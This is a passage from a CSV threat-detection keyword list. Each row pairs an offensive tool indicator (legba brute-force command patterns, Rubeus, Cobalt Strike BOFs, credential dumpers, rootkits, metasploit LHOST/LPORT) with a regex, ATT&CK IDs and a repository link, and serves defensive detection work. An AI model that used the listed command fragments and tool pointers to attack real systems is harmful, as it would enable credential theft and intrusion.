bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.basic *--target *",".{0,1000}legba\shttp\.basic\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.enum *--http*",".{0,1000}legba\shttp\.enum\s.{0,1000}\-\-http.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.ntlm1 *",".{0,1000}legba\shttp\.ntlm1\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.ntlm2 *",".{0,1000}legba\shttp\.ntlm2\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba imap *--target *",".{0,1000}legba\simap\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba kerberos *--target *",".{0,1000}legba\skerberos\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba kerberos*--kerberos-realm *",".{0,1000}legba\skerberos.{0,1000}\-\-kerberos\-realm\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba ldap *--ldap-domain*",".{0,1000}legba\sldap\s.{0,1000}\-\-ldap\-domain.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba mongodb* --target *",".{0,1000}legba\smongodb.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba mssql * --target *",".{0,1000}legba\smssql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba mysql * --target *",".{0,1000}legba\smysql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba pgsql * --target *",".{0,1000}legba\spgsql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba pop3 *--target *",".{0,1000}legba\spop3\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba rdp *--target *",".{0,1000}legba\srdp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba sftp *--target *",".{0,1000}legba\ssftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba smtp *--target *",".{0,1000}legba\ssmtp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba ssh *--target *",".{0,1000}legba\sssh\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba stomp *--target*",".{0,1000}legba\sstomp\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba telnet *--telnet-*",".{0,1000}legba\stelnet\s.{0,1000}\-\-telnet\-.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba vnc* --target *",".{0,1000}legba\svnc.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba-main.zip*",".{0,1000}legba\-main\.zip.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*lem0nSec/ShellGhost*",".{0,1000}lem0nSec\/ShellGhost.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*lengjibo/FourEye*",".{0,1000}lengjibo\/FourEye.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*Leo4j/Amnesiac*",".{0,1000}Leo4j\/Amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Leo4j/Invoke-SMBRemoting*",".{0,1000}Leo4j\/Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*letmeinbrudipls*",".{0,1000}letmeinbrudipls.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*LetMeOutSharp.*",".{0,1000}LetMeOutSharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*LetMeowIn.exe*",".{0,1000}LetMeowIn\.exe.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*LetMeowIn-main.zip*",".{0,1000}LetMeowIn\-main\.zip.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*leviathansecurity/TunnelVision*",".{0,1000}leviathansecurity\/TunnelVision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*lexfo/sshimpanzee*",".{0,1000}lexfo\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*LFI scanner checks.jar*",".{0,1000}LFI\sscanner\schecks\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*lgandx/Pcredz*",".{0,1000}lgandx\/Pcredz.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*lgmpcpglpngdoalbgeoldeajfclnhafa*",".{0,1000}lgmpcpglpngdoalbgeoldeajfclnhafa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*LHOST=* LPORT=*",".{0,1000}LHOST\=.{0,1000}\sLPORT\=.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*liamg/traitor*",".{0,1000}liamg\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*lib/Bruteforcer.cs*",".{0,1000}lib\/Bruteforcer\.cs.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*lib/ForgeTicket.*",".{0,1000}lib\/ForgeTicket\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*lib/S4U.*",".{0,1000}lib\/S4U\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Libbpf-powered rootkit*",".{0,1000}Libbpf\-powered\srootkit.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*LibcRealpathBufferUnderflow/RationalLove.c*",".{0,1000}LibcRealpathBufferUnderflow\/RationalLove\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*libFuzzer-HOWTO.*",".{0,1000}libFuzzer\-HOWTO\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*",".{0,1000}libnfc_crypto1_crack\sa0a1a2a3a4a5\s0\sA\s4\sB.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*libnspr_nspr_log_file_priv_esc.*",".{0,1000}libnspr_nspr_log_file_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*libreoffice2john.py*",".{0,1000}libreoffice2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*libs/bofalloc*",".{0,1000}libs\/bofalloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*libs/bofentry*",".{0,1000}libs\/bofentry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*libs/bofhelper*",".{0,1000}libs\/bofhelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*LibSnaffle.ActiveDirectory*",".{0,1000}LibSnaffle\.ActiveDirectory.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*LibSnaffle.FileDiscovery*",".{0,1000}LibSnaffle\.FileDiscovery.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","0","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*libSSH-Authentication-Bypass*",".{0,1000}libSSH\-Authentication\-Bypass.{0,1000}","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z" "*libxpc_mitm_ssudo.*",".{0,1000}libxpc_mitm_ssudo\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*libxselinux.old*",".{0,1000}libxselinux\.old.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*libxselinux.so*",".{0,1000}libxselinux\.so.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lightsout.py*",".{0,1000}lightsout\.py.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation 